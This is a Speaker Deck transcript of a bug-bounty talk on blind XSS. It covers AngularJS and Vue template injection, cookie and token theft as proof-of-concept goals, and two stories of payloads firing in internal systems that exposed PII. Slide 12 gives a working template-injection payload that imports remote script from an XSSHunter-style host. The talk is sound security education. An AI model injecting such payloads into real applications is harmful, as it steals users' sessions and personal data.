Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Getting Blindly Lucky

JR0ch17
November 01, 2020
Technology
0
59

Getting Blindly Lucky

JR0ch17

November 01, 2020
Tweet

More Decks by JR0ch17

See All by JR0ch17
EASM mistakes waiting to happen
jr0ch17
0
32
Traversing my way in the internal network
jr0ch17
0
130
Getting Started in Bug Bounty
jr0ch17
0
73
Qu'est-ce que le bug bounty?
jr0ch17
0
84
Finding 5 bugs in a single parameter
jr0ch17
0
57
Beyond the Borders of Scope
jr0ch17
0
41
Bad API, hAPI Hackers!
jr0ch17
0
1.5k

Other Decks in Technology

See All in Technology
Forget efficiency – Become more productive without the stress
ufried
0
150
10分でわかるfreeeのQA
freee
1
3.4k
とあるユーザー企業におけるリスクベースで考えるセキュリティ業務のお話し
4su_para
3
330
分布で見る効果検証入門 / ai-distributional-effect
cyberagentdevelopers
PRO
4
700
「最高のチューニング」をしないために / hack@delta 24.10
fujiwara3
21
3.5k
Product Engineer Night #6プロダクトエンジニアを育む仕組み・施策
hacomono
PRO
1
470
一休.comレストランにおけるRustの活用
kymmt90
3
590
新卒1年目が挑む!生成AI × マルチエージェントで実現する次世代オンボーディング / operation-ai-onboarding
cyberagentdevelopers
PRO
1
170
Fargateを使った研修の話
takesection
0
120
visionOSでの空間表現実装とImmersive Video表示について / ai-immersive-visionos
cyberagentdevelopers
PRO
1
110
ユーザーの購買行動モデリングとその分析 / dsc-purchase-analysis
cyberagentdevelopers
PRO
2
100
「 SharePoint 難しい」ってよく聞くけど、そんなに言うなら8歳の息子に試してもらった
taichinakamura
1
630

Featured

See All Featured
Rails Girls Zürich Keynote
gr2m
93
13k
Practical Orchestrator
shlominoach
186
10k
Rebuilding a faster, lazier Slack
samanthasiow
79
8.6k
Being A Developer After 40
akosma
86
590k
RailsConf 2023
tenderlove
29
880
No one is an island. Learnings from fostering a developers community.
thoeni
19
3k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
355
29k
Producing Creativity
orderedlist
PRO
341
39k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
231
17k
Imperfection Machines: The Place of Print at Facebook
scottboms
264
13k
How To Stay Up To Date on Web Technology
chriscoyier
788
250k
Large-scale JavaScript Application Architecture
addyosmani
510
110k

Transcript

  1. Getting Blindly Lucky Interesting Blind XSS Stories

  2. {{ whoami }} Jasmin Landry JR0ch17 Part time bug bounty

    hunter

  3. {{ agenda }} • What is XSS? • & •

    Blind XSS Stories • Questions/Comments

  4. {{ XSS }} Cross-Site Scripting (XSS) attacks are a type

    of injection, in which malicious scripts are injected into trusted websites.* • Malicious Script • Types of XSS • Reflected • DOM => postMessage() • Stored => Blind * https://owasp.org/www-community/attacks/xss/

  5. {{ XSS PoCs}} • Typical PoCs • Steal CSRF Tokens

    • Steal Cookies (if not HttpOnly) • Steal localStorage and sessionStorage tokens • Can also be used in CORS misconfigs with XHR or with the Fetch API to steal sensitive data (ie. PII) • SSRF if found in HTML to PDF converter

  6. {{ }} MVC client-side framework built by Google • XSS

    • Not the typical XSS • Template Injection • {{7*7}} => returns 49 https://jsfiddle.net/navb4jh3/

  7. {{ }} “Progressive” MVVM client-side framework for building UIs and

    SPAs • XSS • Not the typical XSS • Template Injection • {{7*7}} => returns 49 https://jsfiddle.net/s6b3dy25/

  8. {{ vs }} https://www.wappalyzer.com/compare/angular-vs-vue-js/

  9. {{ Blind XSS }} Variant of a Stored XSS. The

    payload is saved and executed in a separate part of the application (ie. Admin panel) or in a completely different application (internal application) • Tools • XSSHunter • Sleepy Puppy • Burp Collaborator

  10. {{ XSSHunter Payloads }}

  11. {{ HackerOne Hacktivity Blind XSS Reports }} All blind XSS

    payloads from HackerOne’s Hacktivity are from an HTML context (ie. <script> tag) Not a single one from template injection

  12. {{ & Blind XSS Payload }} {{ constructor.constructor('import("https://jr0ch17.xss.ht")') () }}

  13. {{ Blind XSS Stories }}

  14. {{ Blind XSS Story #1 }} A Google search lead

    to Apple’s QuickLook feature QuickLook is a way to preview a file to view its contents instead of having to open the file

  15. {{ Blind XSS Story #1 }} When an XSS triggers

    with XSSHunter, it captures the DOM...

  16. {{ Blind XSS Story #1 }}

  17. {{ Blind XSS Story #1 }} Turns out the CSV

    file contained a LOT of PII...

  18. {{ Blind XSS Story #2 }} Again, I look at

    the DOM.....

  19. {{ Blind XSS Story #2 }} Someone had filed a

    complaint on my user!!! The complaint was forwarded as an email The XSS triggered in the email system!

  20. {{ Thank You}} Questions or comments @JR0ch17 https://linkedin.com/in/jasminlandry